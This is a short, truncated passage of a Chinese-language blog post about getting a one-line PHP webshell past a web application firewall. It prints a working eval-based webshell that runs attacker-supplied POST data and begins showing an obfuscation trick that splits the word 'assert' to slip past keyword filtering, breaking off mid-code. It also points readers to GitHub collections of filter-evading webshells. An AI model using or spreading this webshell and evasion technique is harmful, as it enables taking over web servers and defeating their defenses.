論一句話過WAF

一.繞過方式 木馬存在敏感字符被攔截 木馬代碼存在敏感字符,直接被waf。如:如直接傳<?php @@eval($_POST['123']); ?>,由於存在eval危險函數直接被攔截。 這時候需要對被waf的危險字符進行各種變形即可 收集的過狗馬,最大同性交友網站github也有很多webshell項目 $poc = "a#s#s#e#r#t"; $poc_1 = explode("#", $p
相關文章
相關標籤/搜索